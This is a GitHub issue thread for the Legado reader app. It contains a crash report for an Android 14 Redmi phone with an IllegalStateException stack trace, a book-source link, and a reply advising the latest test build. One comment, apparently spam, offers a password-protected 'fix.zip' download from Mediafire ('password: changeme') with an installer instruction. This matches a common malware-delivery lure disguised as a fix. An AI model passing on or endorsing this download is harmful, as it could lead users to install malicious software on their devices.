### ISSUE TITLE
闪退

### ISSUE THREAD

**Issue by gyz1023** [gedoor/legado#4131]
### 确认 / Assignments

- [X] 搜索现有issues，不存在相似或相关的issue / No similar or related issues
- [X] 最新[测试版](https://github.com/gedoor/legado/actions/workflows/test.yml)依然存在此问题 / Latest beta app does not work
- [X] 此问题和Xposed、Lsposed、Magisk、手机主题、浏览器插件、无障碍服务等无关 / Make sure your machine is not touched by hook frameworks, plugins, accessibility etc

### 问题描述 / Describe Bugs

更新后两本书一直闪退，打都打不开，更新之前正常的

### 复现步骤 / How to reproduce

69书吧的两本书，其他书正常，而且这两本调试也挺正常的啊。书源https://jt12.eu/SYV2_4/2024/08/26/19/53/24/172467320466cc6cb432d42.json
两本书是“两界：别叫我邪魔”“从赘婿开始建立长生家族”（刚复现了一下，不是固定几本书，他还会变，这两本正常，又换别的书有问题了）

### 确认 / Assignment

- [X] 已经提交复现所需要的附加资料 / Submit additions related with bugs

### 日志提交 / Relevant log output

"SDK_INT=34
WebViewUserAgent=Mozilla/5.0 (Linux; Android 14; 22021211RC Build/UKQ1.231207.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.193 Mobile Safari/537.36
MODEL=22021211RC
RELEASE=14
MANUFACTURER=Xiaomi
versionName=3.24.082517
versionCode=15608
BRAND=Redmi
java.lang.IllegalStateException: Fragment BooksFragment{19376d4} (e94e3116-c49a-45ea-b965-280ea2108d41) not attached to a context.
	at androidx.fragment.app.Fragment.requireContext(SourceFile:18)
	at io.legado.app.ui.main.bookshelf.style1.books.BooksFragment.o(SourceFile:33)
	at io.legado.app.ui.book.search.a.onClick(SourceFile:510)
	at android.view.View.performClick(View.java:7798)
	at android.view.View.performClickInternal(View.java:7775)
	at android.view.View.-$$Nest$mperformClickInternal(Unknown Source:0)
	at android.view.View$PerformClick.run(View.java:31228)
	at android.os.Handler.handleCallback(Handler.java:958)
	at android.os.Handler.dispatchMessage(Handler.java:99)
	at android.os.Looper.loopOnce(Looper.java:224)
	at android.os.Looper.loop(Looper.java:318)
	at android.app.ActivityThread.main(ActivityThread.java:8790)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:561)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1013)
"

### 阅读版本 / Legado version

3.24082517

### Android版本 / Android version

Android14

### 机型 / Model

redmi k40s

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 821938089** [comment]
更新最新测试版
